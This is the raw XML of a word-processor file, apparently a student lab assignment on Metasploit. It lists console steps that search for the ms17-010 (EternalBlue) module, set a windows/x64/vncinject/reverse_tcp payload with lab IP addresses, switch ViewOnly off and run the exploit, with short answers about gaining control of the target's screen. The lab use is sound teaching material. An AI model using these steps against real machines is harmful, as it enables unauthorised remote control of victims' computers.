          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set payload windows/x64/vncinject/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Show options </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set lhosts 192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit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ab/>
        <w:tab/>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="6313805"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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ab/>
        <w:tab/>
        <w:t xml:space="preserve">c) No, because viewOnly was set to true so the attacker can only view </w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">3.2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">a) </w:t>
        <w:tab/>
        <w:t xml:space="preserve">Search ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use 2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set payload windows/x64/vncinject/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Show options </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set rhosts 192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set ViewOnly false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit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ab/>
        <w:tab/>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="6313805"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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510" cy="631380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ab/>
        <w:tab/>
        <w:t xml:space="preserve">c) Yes, because we changed the viewonly to false which allows us to control the target computer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">d) Yes, both will update simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">e) Because it allows the victim to know that someone else is controlling the computer if the victim happens to sit in front of screen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A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image" Target="media/image10.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Oo/7wDpqs5x5LxkuFrvAkbPx9Q==">AMUW2mXuIDkYgswNR05ivn6Ue2a2rnP6zz4MK0mw5CuuoRqEMo4zneNDVDHcfVtDgfNbkfYjp2EwtE1PTqD3rb/E5hVQ0HX+S4VbrkpviYU9hAq8BmLxOws=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2021-04-11T03:34:00Z</dcterms:created>
  <dc:creator>WATHIK AHMED</dc:creator>
</cp:coreProperties>
</file>